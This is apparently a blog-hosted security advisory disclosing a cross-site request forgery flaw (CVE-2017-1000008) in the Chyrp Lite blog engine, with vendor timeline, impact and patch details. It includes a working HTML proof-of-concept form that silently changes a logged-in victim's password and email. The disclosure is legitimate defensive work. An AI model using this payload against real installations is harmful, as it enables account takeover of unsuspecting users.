Security Advisory – Cross Site Request Forgery in Chyrp Lite

Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

Summary
A cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.

Proof of Concept
Example HTML attack form:

<!-- The form submits when this button is clicked. -->
<button onclick="document.csrf_form.submit()">Click to run</button>
<!-- Edit the 'action' attribute to reflect the IP address or hostname of the victim's Chyrp install. -->
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
	<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
	<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
	<input type="text" name="email" value="user@example.com" id="email" tabindex="1"/>
	<input type="text" name="website" value="http://yahoo.com" id="website" tabindex="1"/>
	<input type="password" name="new_password1" value="apple" id="new_password1"/>
	<input type="password" name="new_password2" value="apple" id="new_password2"/>
</form>

Impact
If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Solution
Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.

Reference
Project home: https://github.com/xenocrat/chyrp-lite
v2017.01 release notes: https://github.com/xenocrat/chyrp-lite/releases/tag/v2017.01
Changelog: https://github.com/xenocrat/chyrp-lite/commit/79bb2de7f57d163d256b6bdb127dc09cfdb6235a
OWASP CSRF overview: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Edit 7/13/17: CVE identifier added.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s